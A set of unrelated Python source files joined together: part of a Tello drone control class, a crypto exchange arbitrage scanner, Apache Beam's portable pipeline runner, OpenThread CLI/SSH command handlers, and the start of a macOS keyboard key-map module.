"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("l")
def flip_right(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("r")
def flip_forward(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("f")
def flip_back(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("b")
@accepts(x=int, y=int, z=int, speed=int)
def go_xyz_speed(self, x, y, z, speed):
"""Tello fly to x y z in speed (cm/s)
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('go %s %s %s %s' % (x, y, z, speed))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int)
def go_xyz_speed(self, x1, y1, z1, x2, y2, z2, speed):
"""Tello fly a curve defined by the current and two given coordinates with speed (cm/s).
- If the arc radius is not within the range of 0.5-10 meters, it responses false.
- x/y/z can’t be between -20 – 20 at the same time.
Arguments:
x1: 20-500
x2: 20-500
y1: 20-500
y2: 20-500
z1: 20-500
z2: 20-500
speed: 10-60
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
@accepts(x=int)
def set_speed(self, x):
"""Set speed to x cm/s.
Arguments:
x: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("speed " + str(x))
last_rc_control_sent = 0
@accepts(left_right_velocity=int, forward_backward_velocity=int, up_down_velocity=int, yaw_velocity=int)
def send_rc_control(self, left_right_velocity, forward_backward_velocity, up_down_velocity, yaw_velocity):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
Returns:
bool: True for successful, False for unsuccessful
"""
if int(time.time() * 1000) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS:
pass
else:
self.last_rc_control_sent = int(time.time() * 1000)
return self.send_command_without_return('rc %s %s %s %s' % (left_right_velocity, forward_backward_velocity,
up_down_velocity, yaw_velocity))
def set_wifi_with_ssid_password(self):
"""Set Wi-Fi with SSID password.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('wifi ssid pass')
def get_speed(self):
"""Get current speed (cm/s)
Returns:
False: Unsuccessful
int: 1-100
"""
return self.send_read_command('speed?')
def get_battery(self) -> object:
"""Get current battery percentage
Returns:
False: Unsuccessful
int: -100
"""
return self.send_read_command('battery?')
def get_flight_time(self):
"""Get current fly time (s)
Returns:
False: Unsuccessful
int: Seconds elapsed during flight.
"""
return self.send_read_command('time?')
def get_height(self):
"""Get height (cm)
Returns:
False: Unsuccessful
int: 0-3000
"""
return self.send_read_command('height?')
def get_temperature(self):
"""Get temperature (°C)
Returns:
False: Unsuccessful
int: 0-90
"""
return self.send_read_command('temperature?')
def get_attitude(self):
"""Get IMU attitude data
Returns:
False: Unsuccessful
int: pitch roll yaw
"""
return self.send_read_command('attitude?')
def get_barometer(self):
"""Get barometer value (m)
Returns:
False: Unsuccessful
int: 0-100
"""
return self.send_read_command('baro?')
def get_distance_tof(self):
"""Get distance value from TOF (cm)
Returns:
False: Unsuccessful
int: 30-1000
"""
return self.send_read_command('tof?')
def get_wifi(self):
"""Get Wi-Fi SNR
Returns:
False: Unsuccessful
str: snr
"""
return self.send_read_command('wifi?')
def end(self):
"""Call this method when you want to end the tello object"""
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
class BackgroundFrameRead:
"""
This class read frames from a VideoCapture in background. Then, just call backgroundFrameRead.frame to get the
actual one.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
def start(self):
Thread(target=self.update_frame, args=()).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
(self.grabbed, self.frame) = self.cap.read()
def stop(self):
self.stopped = True
|
pytrade.py | #!/usr/bin/python3.5
import sys
sys.path.append('exchanges')
import poloniex
import kraken
import bitstamp
import okcoin
import time
import threading
coin = ["Bitcoin", "Litecoin", "Ethereum", "Bitcoin Cash"]
coin_index = 0
coin_index_max = len(coin) - 1
index = [["Poloniex", poloniex, [0, 1, 2, 3]], ["Kraken", kraken, [0, 1, 2, 3]], ["Bitstamp", bitstamp, [0, 1, 2, 3]],
["OKCoin", okcoin, [0, 1, 2, 3]]]
while True:
if coin_index > coin_index_max: coin_index = 0
thread = []
time.sleep(2)
for exchange in index:
print('[UPDATING] {}'.format(exchange[0]))
thread.append(threading.Thread(target=exchange[1].update(coin_index)))
thread[-1].start()
for c in range(0, len(index)):
thread[c].join()
for exchange in index:
for exchange2 in index:
if exchange[1] != exchange2[1] and coin_index in exchange[2] and coin_index in exchange2[2]:
if exchange[1].lastask[0] - exchange2[1].lastbid[0] < 0:
print(
'[TRADE] Buy {} on\t{} \tat {:.8f}\tthen Sell on {}\tat {:.8f}\tProfits of {:.8f} ({:.4f}%)'.format(
coin[coin_index], exchange[0], exchange[1].lastask[0], exchange2[0],
exchange2[1].lastbid[0],
exchange2[1].lastbid[0] - exchange[1].lastask[0],
exchange2[1].lastbid[0] / exchange[1].lastask[0]))
elif exchange[1].lastbid[0] - exchange2[1].lastask[0] > 0:
print(
'[TRADE] Sell {} on\t{} \tat {:.8f}\tthen Buy on {}\tat {:.8f}\tProfits of {:.8f} ({:.4f}%)'.format(
coin[coin_index], exchange[0], exchange[1].lastbid[0], exchange2[0],
exchange2[1].lastask[0],
exchange[1].lastbid[0] - exchange2[1].lastask[0],
exchange[1].lastbid[0] / exchange2[1].lastask[0]))
coin_index = coin_index + 1
|
portable_runner.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import functools
import itertools
import json
import logging
import os
import threading
from concurrent import futures
import grpc
from apache_beam import metrics
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_job_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import local_job_service
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.portability.job_server import DockerizedJobServer
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker import sdk_worker_main
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.STOPPED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
@staticmethod
def default_docker_image():
if 'USER' in os.environ:
# Perhaps also test if this was built?
logging.info('Using latest locally built Python SDK docker image.')
return os.environ['USER'] + '-docker-apache.bintray.io/beam/python:latest'
else:
logging.warning('Could not find a Python SDK docker image.')
return 'unknown'
@staticmethod
def _create_environment(options):
portable_options = options.view_as(PortableOptions)
environment_urn = common_urns.environments.DOCKER.urn
if portable_options.environment_type == 'DOCKER':
environment_urn = common_urns.environments.DOCKER.urn
elif portable_options.environment_type == 'PROCESS':
environment_urn = common_urns.environments.PROCESS.urn
elif portable_options.environment_type in ('EXTERNAL', 'LOOPBACK'):
environment_urn = common_urns.environments.EXTERNAL.urn
elif portable_options.environment_type:
if portable_options.environment_type.startswith('beam:env:'):
environment_urn = portable_options.environment_type
else:
raise ValueError(
'Unknown environment type: %s' % portable_options.environment_type)
if environment_urn == common_urns.environments.DOCKER.urn:
docker_image = (
portable_options.environment_config
or PortableRunner.default_docker_image())
return beam_runner_api_pb2.Environment(
url=docker_image,
urn=common_urns.environments.DOCKER.urn,
payload=beam_runner_api_pb2.DockerPayload(
container_image=docker_image
).SerializeToString())
elif environment_urn == common_urns.environments.PROCESS.urn:
config = json.loads(portable_options.environment_config)
return beam_runner_api_pb2.Environment(
urn=common_urns.environments.PROCESS.urn,
payload=beam_runner_api_pb2.ProcessPayload(
os=(config.get('os') or ''),
arch=(config.get('arch') or ''),
command=config.get('command'),
env=(config.get('env') or '')
).SerializeToString())
elif environment_urn == common_urns.environments.EXTERNAL.urn:
return beam_runner_api_pb2.Environment(
urn=common_urns.environments.EXTERNAL.urn,
payload=beam_runner_api_pb2.ExternalPayload(
endpoint=endpoints_pb2.ApiServiceDescriptor(
url=portable_options.environment_config)
).SerializeToString())
else:
return beam_runner_api_pb2.Environment(
urn=environment_urn,
payload=(portable_options.environment_config.encode('ascii')
if portable_options.environment_config else None))
def run_pipeline(self, pipeline, options):
portable_options = options.view_as(PortableOptions)
job_endpoint = portable_options.job_endpoint
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
if not job_endpoint:
# TODO Provide a way to specify a container Docker URL
# https://issues.apache.org/jira/browse/BEAM-6328
docker = DockerizedJobServer()
job_endpoint = docker.start()
job_service = None
elif job_endpoint == 'embed':
job_service = local_job_service.LocalJobServicer()
else:
job_service = None
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
portable_options.environment_config, server = (
BeamFnExternalWorkerPoolServicer.start(
sdk_worker_main._get_worker_count(options)))
globals()['x'] = server
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# Preemptively apply combiner lifting, until all runners support it.
# This optimization is idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'combine').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn])
if pre_optimize == 'combine':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.lift_combiners],
known_runner_urns=flink_known_urns,
partial=True)
elif pre_optimize == 'all':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.annotate_stateful_dofns_as_roots,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.extract_impulse_stages,
fn_api_runner_transforms.remove_data_plane_ops,
fn_api_runner_transforms.sort_stages],
known_runner_urns=flink_known_urns)
elif pre_optimize == 'none':
pass
else:
raise ValueError('Unknown value for pre_optimize: %s' % pre_optimize)
if not job_service:
channel = grpc.insecure_channel(job_endpoint)
grpc.channel_ready_future(channel).result()
job_service = beam_job_api_pb2_grpc.JobServiceStub(channel)
else:
channel = None
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
if channel:
grpc.channel_ready_future(channel).result()
return job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest())
except grpc._channel._Rendezvous as e:
num_retries += 1
if num_retries > max_retries:
raise e
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action' : 'store', 'help' : option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true'\
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
logging.debug("Runner option '%s' was already added" % option.name)
all_options = options.get_all_options(add_extra_args_fn=add_runner_options)
# TODO: Define URNs for options.
# convert int values: https://issues.apache.org/jira/browse/BEAM-5509
p_options = {'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
for k, v in all_options.items()
if v is not None}
prepare_response = job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job', pipeline=proto_pipeline,
pipeline_options=job_utils.dict_to_struct(p_options)))
if prepare_response.artifact_staging_endpoint.url:
stager = portable_stager.PortableStager(
grpc.insecure_channel(prepare_response.artifact_staging_endpoint.url),
prepare_response.staging_session_token)
retrieval_token, _ = stager.stage_job_resources(
options,
staging_location='')
else:
retrieval_token = None
try:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=prepare_response.preparation_id))
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain(
[next(state_stream)],
state_stream)
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=prepare_response.preparation_id))
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result.
run_response = job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id,
retrieval_token=retrieval_token))
if state_stream is None:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=run_response.job_id))
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=run_response.job_id))
return PipelineResult(job_service, run_response.job_id, message_stream,
state_stream, cleanup_callbacks)
class PortableMetrics(metrics.metric.MetricResults):
def __init__(self):
pass
def query(self, filter=None):
return {'counters': [],
'distributions': [],
'gauges': []}
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id, message_stream, state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
def cancel(self):
try:
self._job_service.Cancel(beam_job_api_pb2.CancelJobRequest(
job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
return PortableMetrics()
def _last_error_message(self):
# Filter only messages with the "message_response" and error messages.
messages = [m.message_response for m in self._messages
if m.HasField('message_response')]
error_messages = [m for m in messages
if m.importance ==
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self):
def read_messages():
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
logging.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(
message.state_response.state))
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
t.join(10)
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s: %s' % (
self._job_id, self._state, self._last_error_message()))
return self._state
finally:
self._cleanup()
def _cleanup(self):
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
class BeamFnExternalWorkerPoolServicer(
beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolServicer):
def __init__(self, worker_threads):
self._worker_threads = worker_threads
@classmethod
def start(cls, worker_threads=1):
worker_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
worker_address = 'localhost:%s' % worker_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnExternalWorkerPoolServicer_to_server(
cls(worker_threads), worker_server)
worker_server.start()
return worker_address, worker_server
def NotifyRunnerAvailable(self, start_worker_request, context):
try:
worker = sdk_worker.SdkHarness(
start_worker_request.control_endpoint.url,
worker_count=self._worker_threads,
worker_id=start_worker_request.worker_id)
worker_thread = threading.Thread(
name='run_worker_%s' % start_worker_request.worker_id,
target=worker.run)
worker_thread.daemon = True
worker_thread.start()
return beam_fn_api_pb2.NotifyRunnerAvailableResponse()
except Exception as exn:
return beam_fn_api_pb2.NotifyRunnerAvailableResponse(
error=str(exn))
|
command_handlers.py | #!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Any, Callable, Optional, Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
@abstractmethod
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
"""Method set_line_read_callback should register a callback that will be called for every line
output by the OT CLI.
This is useful for handling asynchronous command output while still being able to execute
other commands.
"""
pass
def shell(self, cmd: str, timeout: float) -> List[str]:
raise NotImplementedError("shell command is not supported on %s" % self.__class__.__name__)
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r'|(\[[DINWC\-]\] (?=[\w\-]{14}:)\w+-*:)' # e.g. [I] Mac-----------:
r')')
"""regex used to filter logs"""
assert __PATTERN_LOG_LINE.match('[I] ChannelMonitor: debug log')
assert __PATTERN_LOG_LINE.match('[I] Mac-----------: info log')
assert __PATTERN_LOG_LINE.match('[N] MeshForwarder-: note log')
assert __PATTERN_LOG_LINE.match('[W] Notifier------: warn log')
assert __PATTERN_LOG_LINE.match('[C] Mle-----------: critical log')
assert __PATTERN_LOG_LINE.match('[-] Settings------: none log')
assert not __PATTERN_LOG_LINE.match('[-] Settings-----: none log') # not enough `-` after module name
__ASYNC_COMMANDS = {'scan', 'ping', 'discover'}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__line_read_callback = None
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
self.__otcli_reader.setDaemon(True)
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> List[str]:
assert not self.__should_close.is_set(), "OT CLI is already closed."
self.__otcli.writeline(cmd)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
self.__otcli.writeline('extaddr')
self.wait(1)
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
self.__otcli_reader.join()
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
while not self.__should_close.is_set():
try:
line = self.__otcli.readline()
except Exception:
if self.__should_close.is_set():
break
else:
raise
logging.debug('%s: %r', self.__otcli, line)
if line is None:
break
if line.startswith('> '):
line = line[2:]
if self.__line_read_callback is not None:
self.__line_read_callback(line)
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password, sudo):
import paramiko
self.__host = host
self.__port = port
self.__sudo = sudo
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__line_read_callback = None
try:
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
except paramiko.ssh_exception.AuthenticationException:
if not password:
self.__ssh.get_transport().auth_none(username)
else:
raise
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'ot-ctl {cmd}'
if self.__sudo:
sh_cmd = 'sudo ' + sh_cmd
output = self.shell(sh_cmd, timeout=timeout)
if self.__line_read_callback is not None:
for line in output:
self.__line_read_callback(line)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
return output
def shell(self, cmd: str, timeout: float) -> List[str]:
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(cmd, timeout=int(timeout), bufsize=1024)
errput = [l.rstrip('\r\n') for l in cmd_err.readlines()]
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
if errput:
raise CommandError(cmd, errput)
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
|
_darwinkeyboard.py | import ctypes
import ctypes.util
import Quartz
import time
import os
import threading
from AppKit import NSEvent
from ._keyboard_event import KeyboardEvent, KEY_DOWN, KEY_UP, normalize_name
try: # Python 2/3 compatibility
unichr
except NameError:
unichr = chr
Carbon = ctypes.cdll.LoadLibrary(ctypes.util.find_library('Carbon'))
class KeyMap(object):
non_layout_keys = dict((vk, normalize_name(name)) for vk, name in {
# Layout specific keys from https://stackoverflow.com/a/16125341/252218
# Unfortunately no source for layout-independent keys was found.
0x24: 'return',
0x30: 'tab',
0x31: 'space',
0x33: 'delete',
0x35: 'escape',
0x37: 'command',
0x38: 'shift',
0x39: 'capslock',
0x3a: 'option',
0x3b: 'control',
0x3c: 'right shift',
0x3d: 'right option',
0x3e: 'right control',
0x3f: 'function',
0x40: 'f17',
0x48: 'volume up',
0x49: 'volume down',
0x4a: 'mute',
0x4f: 'f18',
0x50: 'f19',
0x5a: 'f20',
0x60: 'f5',
0x61: 'f6',
0x62: 'f7',
0x63: 'f3',
0x64: 'f8',
0x65: 'f9',
0x67: 'f11',
0x69: 'f13',
0x6a: 'f16',
0x6b: 'f14',
0x6d: 'f10',
0x6f: 'f12',
0x71: 'f15',
0x72: 'help',
0x73: 'home',
0x74: 'page up',
0x75: 'forward delete',
0x76: 'f4',
0x77: 'end',
0x78: 'f2',
0x79: 'page down',
0x7a: 'f1',
0x7b: 'left',
0x7c: 'right',
0x7d: 'down',
0x7e: 'up',
}.items())
layout_specific_keys = {}
def __init__(self):
# Virtual key codes are usually the same for any given key, unless you have a different
# keyboard layout. The only way I've found to determine the layout relies on (supposedly
# deprecated) Carbon APIs. If there's a more modern way to do this, please update this
# section.
# Set up data types and exported values:
CFTypeRef = ctypes.c_void_p
CFDataRef = ctypes.c_void_p
CFIndex = ctypes.c_uint64
OptionBits = ctypes.c_uint32
UniCharCount = ctypes.c_uint8
UniChar = ctypes.c_uint16
UniChar4 = UniChar * 4
class CFRange(ctypes.Structure):
_fields_ = [('loc', CFIndex),
('len', CFIndex)]
kTISPropertyUnicodeKeyLayoutData = ctypes.c_void_p.in_dll(Carbon, 'kTISPropertyUnicodeKeyLayoutData')
shiftKey = 0x0200
alphaKey = 0x0400
optionKey = 0x0800
controlKey = 0x1000
kUCKeyActionDisplay = 3
kUCKeyTranslateNoDeadKeysBit = 0
# Set up function calls:
Carbon.CFDataGetBytes.argtypes = [CFDataRef] #, CFRange, UInt8
Carbon.CFDataGetBytes.restype = None
Carbon.CFDataGetLength.argtypes = [CFDataRef]
Carbon.CFDataGetLength.restype = CFIndex
Carbon.CFRelease.argtypes = [CFTypeRef]
Carbon.CFRelease.restype = None
Carbon.LMGetKbdType.argtypes = []
Carbon.LMGetKbdType.restype = ctypes.c_uint32
Carbon.TISCopyCurrentKeyboardInputSource.argtypes = []
Carbon.TISCopyCurrentKeyboardInputSource.restype = ctypes.c_void_p
Carbon.TISCopyCurrentASCIICapableKeyboardLayoutInputSource.argtypes = []
